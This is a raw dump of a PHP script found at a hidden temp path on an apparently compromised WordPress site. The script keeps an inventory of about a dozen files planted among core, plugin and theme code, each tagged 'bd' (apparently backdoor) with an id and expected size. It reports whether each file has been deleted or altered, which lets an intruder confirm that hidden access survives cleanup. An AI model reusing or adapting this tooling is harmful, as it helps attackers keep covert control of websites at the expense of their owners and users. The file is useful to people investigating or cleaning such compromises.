File: //proc/thread-self/root/tmp/.multi
<?php $r = '/home/florin/sites/dentoutline/current/public'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php"=>"bd@@1262755@@7",
"/wp-content/plugins/shortcodes-ultimate/inc/core/tools.php"=>"bd@@1263564@@5",
"/wp-content/plugins/redirection/database/database-upgrader.php"=>"bd@@1264804@@98",
"/wp-content/plugins/insert-headers-and-footers/includes/execute/class-wpcode-snippet-execute-js.php"=>"bd@@1265194@@86",
"/wp-content/themes/Divi/core/components/api/email/ConvertKit.php"=>"bd@@1265734@@45",
"/wp-content/plugins/contact-form-7/load.php"=>"bd@@1266053@@95",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/field.php"=>"bd@@1266686@@957",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/ConfigSchema/Interchange/spotlight.php"=>"bd@@1266814@@973",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/ChildDef/libmail.php"=>"bd@@1267072@@937",
"/wp-content/plugins/popup-maker/vendor-prefixed/pimple/pimple/src/Pimple/Tests/sug1.php"=>"bd@@1267191@@946",
"/wp-content/plugins/contact-1771601883/css/archives-1771601883.php"=>"bd@@1260043@@1106",
"/wp-content/plugins/popup-maker/includes/legacy/importer/easy-modal-v2/model/modal/picmgr.php"=>"bd@@1267253@@1026"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');